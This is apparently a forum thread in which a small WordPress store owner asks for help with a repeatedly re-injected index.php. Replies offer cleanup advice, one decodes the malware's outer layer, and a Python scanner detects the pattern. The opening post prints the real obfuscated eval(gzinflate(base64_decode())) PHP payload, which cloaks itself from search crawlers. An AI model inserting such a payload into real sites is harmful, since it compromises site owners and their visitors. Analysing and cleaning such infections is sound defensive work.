SoCalGaming
Hi everyone,

I'm new here! Well, long story short, I run a small online store hosted by GoDaddy using WordPress. My site got hacked and I have no idea what to do. :[ If anyone knows how to fix the root of this problem, please let me know. I really need help here! (And yes, if it's something that takes work I can even offer some cash.)


Domain: www.socalgaming.com

Description of problem:

When I went to check out the files on the server, I noticed the index.php file had been edited, and the following script was placed in the file:

<?php eval(gzinflate(base64_decode('AFAGr/lpZiAoIWlzc2V0KCRmdGwpKXsgZ2xvYmFsICRmdGw7JGZ0bD0xOw0KCQllcnJvcl9yZXBvcnRpbmcoMCk7DQoJCWlmKCFwcmVnX21hdGNoKCcjYm90fHNwaWRlcnxjcmF3bHxzbHVycHx5YW5kZXgjaScsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpew0KCQlwcmludChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN0wwSFlCeEpsaVVtTDIzS2UzOUs5VXJYNEhTaENJQmdFeVRZa0VBUTdNR0l6ZWFTN0IxcFJ5TXBxeXFCeW1WV1pWMW1Ga0RNN1oyODk5NTc3NzMzM252dnZmZTZPNTFPSi9mZi96OWNabVFCYlBiT1N0ckpuaUdBcXNnZlAzNThIejhpSGpmVHVsaTFSNWVmZlhTWmZmVEpSK1ZIaDIxOS9Zdnp5VVdUMTVOUFBqbjhKZE9zbmM2M21tV2RYOVR2N3Z4aWZMdjFSZGJPUC9ub296dGJkL1RySDdTVHZMM3ppeGVmNFp2RC9QS3pxMkk1cTY2Kzl4R0J6RC82NVBMN2g3L2svUHl6ajg3cmFuRkNIODJ6anc2TDg2MmR2WjNQUHR0NXQ3dHo1L3o4azg4K3F2RlZOY3MvT2x4Kzl0SGUvVi80Qy9jKy9ZVy9jSGR2bC83WmZmZ0xmK0grd1MvOGhmY2Y0QS8rK0FDL1VhUGRlL3Y0RTcvdDRqTis2ZDY5WC9nTFA5M0RYenY0L0lGK2RIRGZObjFnbXNwdjNHSlAvem5nWHdCc2gxOUhCOERnSWI5NXozOFRDTjNuanhuMEEvMTQ5eDQrLzFRUjNpRlFuektRSGYxa24zN1pleWdqN0k5MDk1N3QxbzNybnI2TC96LzROSHg5ZDM5UDZLTWt3SnM4R3VDeXp4RHBIMEF3blhsRXNDUzlGNHpNMGVSVGZINlBTUTBNR1UxdWF3bEFnQjg4TUY4TmpZRHhFeHJ6bDUvS1MvZDU2UGlFWVhJRGpPM0J2aENOZTVjcFozQThyUHY2SjgveDBKZUtya1VITENOTVllakovVW9IYU1YRFpnb0NwTXdZTitWaGhkUmh3aGhjQlgvR21udGpYSGExS1FiNVlFZitmOTlONXdCTXRQNzBRRnJLelBGdzdEaGxrZ0JPRzMycXFJS09UR0xic2I3MTBIekc0SWZlc3N3dmpMOW5CbStuU0FiRkRYYk5iN3YyTTBkK0MrTUJmMlE1Um9qTFkrVU9NUDFXa0dWR0xGeGhBdjdIY0NKRDI3WC8zSE5mTW1QZU0vOHd4UzFEeUdRZTZKZk1VdFQ4Z1gxRklCaHUwNjh3M0FjNmRHWU9HZXZBckdIR0lRRDNEK1J0WDhwMjkzYzdId2lVZlF1QUtkc2ZyVXprcG03NU05WXczQ0FtM3N3NS9CYmFpbnA0S0w5Z2VQTEJlNmdBMGJadUxwMldPYmlOYXJXcWN1TzRlRWhtRHRIb1V6TUFmV1hQNkdmK2g3L2NzVUFacFFBdmhzZEQyelgvWUJ6NDZOTWQvZXBIMnNmQTlMV1BZV2pHampzYjBoSHlKUS9jNkJsRndINjI1NzVsT2dNcjdXZXpqbUJodkQwV1FnOHpISzlINmNSQXRYM2ZVcU84THhaV0RzUVk3cmtlb1dUd004TGZsakx1ZmZuU2NnMyt1UVdnRHhRVUo2Tk9KZXpJbDBaa1B2VVFHT0FUNTNTNXNmR1hicllqZExZNndySkR4SWpkaE1rSE9Ub2lpNWFDVnJxRkk2MEU3VmxBR05DQm5ib2RKMW1FeFVQTFh2Wk5TMmY1R0xBRUtaMVgxdWM3RDJSVXV6c1BEVm9NOHFGOXhlS0FJWEQzVG95a0wvUmpWTXFBY2ZwbzNLektvdDM2NkJmK3dvL3VITTQvMnp0c1B2dUlYZlBGbmZP
cTNpbysyemtzdGovZHUvKzc0cGZQZGo4cDd2eml0NThWYUNBTy9uaFdUZGVMZk5uZWFUNzU3SFZiRjh1TDc1MmZmMzlyK2IzaSs5dnc3ejhwZnZmNW5UdUh2K1FIbnpYaThlOSt4aTcvN3AzOGN1c0g5TVhqdXhxQi9EOEJBQUQvL3c9PScpKSk7DQoJCX0NCn0NCgEAAP//')));?>

I erased this script, re-uploaded the file, and the site was restored to how it was before. I changed the GoDaddy account password and the FTP account password to avoid this happening again. However, within 24 hours of this, the site crashed again and the same script had been placed in the index.php file.


So yeah, obviously not sure what to do or how to find the problem. If anyone knows anything, or wants to help and possibly earn some cash, please let me know!

Thanks,
Chris G
SoCalGaming
christiang@yahoo.com
21 comments
You are probably keylogged. Try formatting everything and scan your PC for viruses. Once done, install KeyScrambler, change your passwords and try reverting to your old backup. Should work fine.
 
I would check the plugin that uses pluggable.php

Code:
Warning: Cannot modify header information - headers already sent by (output started at /home/content/99/8686399/html/store/index.php(1) : eval()'d code:5) in /home/content/99/8686399/html/store/wp-includes/pluggable.php on line 866

http://blog.sucuri.net/2012/08/wordpress-pluggable-php-being-compromised.html


Edit: it's a WordPress core file; have you upgraded to the latest version? If not, do it now.
 
The warning message you see is due to a blank line at the beginning or end of one of your files. PHP does not like blank lines.
Also it may mean that some of your files are still infected and you could get more malware. I can tell you from experience that you probably have been exploited through a weak password or WordPress vulnerability, and there is surely a backdoor script on your account. If you want more details or assistance, let me know and I can provide you with my knowledge further.
I do cleanups on infected sites on a daily basis.
 
Thanks for all the help guys! I'm doing my best to try and understand what all this means, but everything will be passed onto my IT guy. Hopefully we can figure this out ASAP.
 
If you have FTP & SQL backups, no need to worry about it.

Now this error message comes up:

"Reported Attack Page!
This web page at [your domain] has been reported as an attack page and has been blocked based on your security preferences."
 
Unlike the previous post, you should worry about it.

Get an SQL backup immediately. Then hunt for another WordPress theme. After that, reformat your VPS/server (are you on a shared host?). Then start again with the new theme and the old SQL file.
 
Dude, your site was hacked the following way:
One of your plugins is vulnerable to a file upload vulnerability; the hacker uploaded his malicious file (his own index.php) and then defaced your site.
Solution: fix your security.
It's nothing related to GoDaddy, it's WordPress.
1. Update to the latest versions.
2. Triple check your plugins and update them all.
3. Change your WordPress admin password.
4. Do a check on your server to see if the hacker uploaded a backdoor shell to the site; check if any PHP files have been backdoored.
You are good to go.
 
Update your WP to the latest version. After that, scan for viruses. Then change all your passwords to at least 12-character randomly generated passwords. Why? Because they are REALLY hard to crack (if he's getting your password hash in the first place, which I doubt).
 
My site was infected too. What I did is install this plugin http://wordpress.org/extend/plugins/wordfence/, purchase the premium option and run it. Without this plugin, it was a tedious task to find the infected files and delete them manually.

I'm not affiliated at all with the plugin developer, just trying to help from my experience.

Besides PHP files, if you run a cache plugin, your cache files are infected too.
 
This could easily not be his/her problem. If the server he is hosted on has bad security measures, another site could have been infected and is running rampant on the server. Do you know what security practices GoDaddy uses on the server in question? GoDaddy has had some security problems in the past, so it could possibly be that. To start helping you on this now: as others suggested, is your WordPress up to date? Are all the plugins you have installed up to date? If so, then this (if it's another site) could be a 0day exploit. If this is another site's vulnerability, then you should be asking GoDaddy if they are using suPHP, Suhosin, open_basedir, etc. It wouldn't hurt to upload a php.ini file to have a look and see if PHP isn't outdated, as I have seen some uppity hosts use ancient PHP versions *cough* HostGator *cough*.

@Sambaker's solution could work for you as well, but if it's another site that has the vulnerability, it might not work.

If you are still having problems and cannot seem to find help, you can send me a PM and I can hopefully help you more. There are security audit IT companies out there, but on a shared environment it could be hard to chase down.

Edit: If you're running any type of sales script, you should also be backing up your site at least daily.
Code:
http://www.hotscripts.com/listing/backup-sites-and-dbs/
 
This is the Base64 code after decoding; I found this in the script:

Code:
// Guard so the stub runs only once per request, then silence all PHP errors
if (!isset($ftl)){ global $ftl;$ftl=1;
		error_reporting(0);
		// Cloaking: skip search-engine crawlers so the injected content is only served to real visitors
		if(!preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT'])){
		// Second obfuscation layer: the injected content is itself base64 + gzinflate encoded
		print(gzinflate(base64_decode('...')));
		}
}
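A static way to do the "check if any PHP file has been backdoored" step from the list above, tied to the exact eval(gzinflate(base64_decode())) chain and the crawler-cloaking stub decoded in this thread. This is an added example, not code from any poster; it assumes you read each PHP file's text into a string and pass it to scan_source, and it builds its own constructed sample file instead of using the real payload.

```python
import base64
import re
import zlib

# Signature of the injection quoted in this thread; the decoded layer uses print()
# around the same gzinflate(base64_decode()) chain, so both spellings are matched.
LAYER_RE = re.compile(
    r"(?:eval|print)\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)")
# Crawler cloaking as in the decoded stub: content is served only to non-bot user agents.
CLOAK_RE = re.compile(r"preg_match\s*\([^)]*bot[^)]*HTTP_USER_AGENT")

def encode_layer(php_source: str, call: str = "eval") -> str:
    """Build the same wrapper the injection used (here only to construct a sample file)."""
    comp = zlib.compressobj(level=9, wbits=-15)  # raw deflate is what gzinflate() expects
    raw = comp.compress(php_source.encode()) + comp.flush()
    return "%s(gzinflate(base64_decode('%s')))" % (call, base64.b64encode(raw).decode())

def decode_layer(blob: str) -> str:
    """Unwrap one base64 + raw-deflate layer statically, never executing it."""
    return zlib.decompress(base64.b64decode(blob), -15).decode("utf-8", "replace")

def scan_source(src: str) -> dict:
    """Peel every obfuscation layer in a PHP file's text and report what it hides."""
    layers, queue = [], [src]
    while queue:
        text = queue.pop()
        for blob in LAYER_RE.findall(text):
            try:
                inner = decode_layer(blob)
            except (ValueError, zlib.error):
                inner = ""  # truncated or not deflate data: still record the hit
            layers.append(inner)
            if inner:
                queue.append(inner)  # nested layers get decoded too
    return {
        "injected": bool(layers),
        "layers": layers,
        "cloaks_from_crawlers": any(CLOAK_RE.search(t) for t in [src] + layers),
        # bytes before the opening tag are what trigger "headers already sent" warnings
        "junk_before_php_tag": not src.startswith("<?php"),
    }

def build_sample() -> str:
    """Constructed infected index.php: two-layer stub shaped like the one decoded above."""
    html = encode_layer("<!-- constructed stand-in for injected HTML -->", "print")
    stub = ("if(!isset($ftl)){ global $ftl;$ftl=1;\n error_reporting(0);\n"
            " if(!preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT'])){\n"
            "  " + html + ";\n }\n}")
    return "<?php " + encode_layer(stub) + ";?>\n<?php /* the site's own index.php */ ?>"
```

Run scan_source over every .php file under the web root (cache directories included, as noted above) and treat any file with "injected" set as a file to restore from a clean backup rather than edit in place.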
 
@SoCalGaming
I am currently busy these days, I have no time :(
I am sure you will find someone else to help you.
Follow the guidelines I gave above.
 
Thanks again to everyone who has helped. I think the Malware has been removed, but I'm having issues getting GoDaddy to approve my site and having my site re-submitted to Google. If anyone wants to go ahead and help me out w/that, please send me a message.
 
Well, go to your Google Webmaster account and resubmit your sitemap.
Wait for 24 hours and your site will appear in the search results @ Google.
 
How do I double check to make sure there is no more malware on the site? And what exactly do I write in the summary when I request Google to resubmit the site. I want to play this as safe as possible.
 